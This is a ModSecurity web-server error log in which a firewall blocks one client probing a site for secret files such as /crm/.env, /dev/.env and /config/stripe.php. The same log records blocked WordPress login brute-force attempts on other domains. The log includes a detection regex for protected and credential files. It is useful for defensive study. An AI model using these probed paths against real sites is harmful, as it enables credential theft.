[Tue May 26 14:49:40.570037 2026] [security2:error] [pid 648203:tid 648452] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrLEQDDtxJNiDrdTrEwAA_FQ"]
[Tue May 26 14:49:40.570297 2026] [security2:error] [pid 648203:tid 648452] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrLEQDDtxJNiDrdTrEAAA_Fw"]
[Tue May 26 14:49:40.572478 2026] [security2:error] [pid 648203:tid 648452] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrLEQDDtxJNiDrdTrEQAA_AM"]
[Tue May 26 14:49:40.604632 2026] [security2:error] [pid 648203:tid 648452] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrLEQDDtxJNiDrdTrFAAA_GQ"]
[Tue May 26 14:49:40.647262 2026] [security2:error] [pid 648203:tid 648325] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.leakyleaks.moes-art.com"] [uri "/config/env.php"] [unique_id "ahVlrLEQDDtxJNiDrdTrHgAApnk"]
[Tue May 26 14:49:40.665388 2026] [security2:error] [pid 648203:tid 648355] [client 209.50.170.170:22481] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlq7EQDDtxJNiDrdTqiAAAAJs"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:49:40.693574 2026] [security2:error] [pid 648203:tid 648366] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrLEQDDtxJNiDrdTrGAAApmc"]
[Tue May 26 14:49:40.695114 2026] [security2:error] [pid 648203:tid 648297] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.leakyleaks.moes-art.com"] [uri "/config/module.config.php"] [unique_id "ahVlrLEQDDtxJNiDrdTrJAAApl0"]
[Tue May 26 14:49:40.697641 2026] [security2:error] [pid 648203:tid 648274] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.leakyleaks.moes-art.com"] [uri "/config/nexmo.php"] [unique_id "ahVlrLEQDDtxJNiDrdTrJQAApkY"]
[Tue May 26 14:49:40.700938 2026] [security2:error] [pid 648203:tid 648366] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrLEQDDtxJNiDrdTrGwAApmo"]
[Tue May 26 14:49:40.717882 2026] [security2:error] [pid 648203:tid 648317] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.leakyleaks.moes-art.com"] [uri "/config/stripe.php"] [unique_id "ahVlrLEQDDtxJNiDrdTrMAAApnE"]
[Tue May 26 14:49:40.721204 2026] [security2:error] [pid 648203:tid 648366] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrLEQDDtxJNiDrdTrIAAApgE"]
[Tue May 26 14:49:40.770694 2026] [security2:error] [pid 648203:tid 648398] [client 31.57.184.107:55822] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "autodiscover.siliconelevators.in"] [uri "/wp-login.php"] [unique_id "ahVlrLEQDDtxJNiDrdTrGQAAAMY"]
[Tue May 26 14:49:41.321734 2026] [security2:error] [pid 648203:tid 648366] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrLEQDDtxJNiDrdTrKwAApj4"]
[Tue May 26 14:49:41.328116 2026] [security2:error] [pid 648203:tid 648366] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrLEQDDtxJNiDrdTrLQAApl4"]
[Tue May 26 14:49:41.332133 2026] [security2:error] [pid 648203:tid 648359] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrLEQDDtxJNiDrdTrLwAAAJ8"]
[Tue May 26 14:49:41.334923 2026] [security2:error] [pid 648203:tid 648397] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrLEQDDtxJNiDrdTrOAAAAMU"]
[Tue May 26 14:49:41.339333 2026] [security2:error] [pid 648203:tid 648374] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrLEQDDtxJNiDrdTrKgAAAK4"]
[Tue May 26 14:49:41.341494 2026] [security2:error] [pid 648203:tid 648366] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrLEQDDtxJNiDrdTrMgAApmg"]
[Tue May 26 14:49:41.343144 2026] [security2:error] [pid 648203:tid 648390] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrLEQDDtxJNiDrdTrLgAAAL4"]
[Tue May 26 14:49:41.344056 2026] [security2:error] [pid 648203:tid 648366] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrLEQDDtxJNiDrdTrNQAApgY"]
[Tue May 26 14:49:41.346316 2026] [security2:error] [pid 648203:tid 648366] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrLEQDDtxJNiDrdTrPgAApnc"]
[Tue May 26 14:49:41.349518 2026] [security2:error] [pid 648203:tid 648454] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrLEQDDtxJNiDrdTrRQAAAP4"]
[Tue May 26 14:49:41.351087 2026] [security2:error] [pid 648203:tid 648433] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrLEQDDtxJNiDrdTrOwAAAOk"]
[Tue May 26 14:49:41.351907 2026] [security2:error] [pid 648203:tid 648409] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrLEQDDtxJNiDrdTrRwAAANE"]
[Tue May 26 14:49:41.356461 2026] [security2:error] [pid 648203:tid 648428] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrLEQDDtxJNiDrdTrNAAAAOQ"]
[Tue May 26 14:49:41.358663 2026] [security2:error] [pid 648203:tid 648366] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrLEQDDtxJNiDrdTrQAAApgQ"]
[Tue May 26 14:49:41.370371 2026] [security2:error] [pid 648203:tid 648366] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrLEQDDtxJNiDrdTrPAAAplU"]
[Tue May 26 14:49:41.405260 2026] [security2:error] [pid 648203:tid 648405] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrLEQDDtxJNiDrdTrRgAAAM0"]
[Tue May 26 14:49:41.504991 2026] [security2:error] [pid 648203:tid 648215] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/crm/.env"] [unique_id "ahVlrbEQDDtxJNiDrdTrbgAA1gs"]
[Tue May 26 14:49:41.507179 2026] [security2:error] [pid 648203:tid 648305] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/cron/.env"] [unique_id "ahVlrbEQDDtxJNiDrdTrbwAA1mU"]
[Tue May 26 14:49:41.513696 2026] [security2:error] [pid 648203:tid 648319] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/current/.env"] [unique_id "ahVlrbEQDDtxJNiDrdTrcQAA1nM"]
[Tue May 26 14:49:41.521944 2026] [security2:error] [pid 648203:tid 648330] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/demo/.env"] [unique_id "ahVlrbEQDDtxJNiDrdTrcwAA1n4"]
[Tue May 26 14:49:41.556736 2026] [security2:error] [pid 648203:tid 648378] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrbEQDDtxJNiDrdTraQAAALI"]
[Tue May 26 14:49:41.562586 2026] [security2:error] [pid 648203:tid 648414] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrbEQDDtxJNiDrdTrXAAA1gA"]
[Tue May 26 14:49:41.564939 2026] [security2:error] [pid 648203:tid 648383] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrbEQDDtxJNiDrdTrXwAAALc"]
[Tue May 26 14:49:41.569788 2026] [security2:error] [pid 648203:tid 648425] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrbEQDDtxJNiDrdTrcAAAAOE"]
[Tue May 26 14:49:41.570251 2026] [security2:error] [pid 648203:tid 648414] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrbEQDDtxJNiDrdTrawAA1lc"]
[Tue May 26 14:49:41.572872 2026] [security2:error] [pid 648203:tid 648450] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrbEQDDtxJNiDrdTrbAAAAPo"]
[Tue May 26 14:49:41.575283 2026] [security2:error] [pid 648203:tid 648414] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrbEQDDtxJNiDrdTragAA1gc"]
[Tue May 26 14:49:41.590758 2026] [security2:error] [pid 648203:tid 648385] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrbEQDDtxJNiDrdTrdwAAALk"]
[Tue May 26 14:49:41.604549 2026] [security2:error] [pid 648203:tid 648422] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrbEQDDtxJNiDrdTreAAAAN4"]
[Tue May 26 14:49:41.625404 2026] [security2:error] [pid 648203:tid 648282] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/dev/.env"] [unique_id "ahVlrbEQDDtxJNiDrdTrfAAAnU4"]
[Tue May 26 14:49:41.654765 2026] [security2:error] [pid 648203:tid 648316] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/develop/.env"] [unique_id "ahVlrbEQDDtxJNiDrdTrfgAAnXA"]
[Tue May 26 14:49:41.657377 2026] [security2:error] [pid 648203:tid 648229] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/developer/.env"] [unique_id "ahVlrbEQDDtxJNiDrdTrfwAAnRk"]
[Tue May 26 14:49:41.665276 2026] [security2:error] [pid 648203:tid 648255] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/development/.env"] [unique_id "ahVlrbEQDDtxJNiDrdTrgAAAnTM"]
[Tue May 26 14:49:41.684252 2026] [security2:error] [pid 648203:tid 648357] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrbEQDDtxJNiDrdTrfQAAnRw"]
[Tue May 26 14:49:41.741983 2026] [security2:error] [pid 648203:tid 648350] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrbEQDDtxJNiDrdTrgwAAAJY"]
[Tue May 26 14:49:41.900329 2026] [security2:error] [pid 648203:tid 648220] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/erp/.env"] [unique_id "ahVlrbEQDDtxJNiDrdTrsgAAnRA"]
[Tue May 26 14:49:41.940620 2026] [security2:error] [pid 648203:tid 648396] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlrbEQDDtxJNiDrdTrZQAAAMQ"]
[Tue May 26 14:49:41.964346 2026] [security2:error] [pid 648203:tid 648351] [client 45.3.45.97:30097] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.45.3.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlrbEQDDtxJNiDrdTrhAAAAJc"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:49:42.292761 2026] [security2:error] [pid 648203:tid 648357] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrbEQDDtxJNiDrdTriQAAnXg"]
[Tue May 26 14:49:42.303109 2026] [security2:error] [pid 648203:tid 648359] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrbEQDDtxJNiDrdTrmQAAAJ8"]
[Tue May 26 14:49:42.303665 2026] [security2:error] [pid 648203:tid 648379] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrbEQDDtxJNiDrdTrmwAAALM"]
[Tue May 26 14:49:42.304228 2026] [security2:error] [pid 648203:tid 648362] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrbEQDDtxJNiDrdTriwAAAKI"]
[Tue May 26 14:49:42.306045 2026] [security2:error] [pid 648203:tid 648346] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrbEQDDtxJNiDrdTrlgAAAJI"]
[Tue May 26 14:49:42.310881 2026] [security2:error] [pid 648203:tid 648370] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrbEQDDtxJNiDrdTrnAAAAKo"]
[Tue May 26 14:49:42.313342 2026] [security2:error] [pid 648203:tid 648397] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrbEQDDtxJNiDrdTrnQAAAMU"]
[Tue May 26 14:49:42.318394 2026] [security2:error] [pid 648203:tid 648356] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrbEQDDtxJNiDrdTrmgAAAJw"]
[Tue May 26 14:49:42.329654 2026] [security2:error] [pid 648203:tid 648430] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrbEQDDtxJNiDrdTrogAAAOY"]
[Tue May 26 14:49:42.332361 2026] [security2:error] [pid 648203:tid 648357] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrbEQDDtxJNiDrdTrpQAAnQo"]
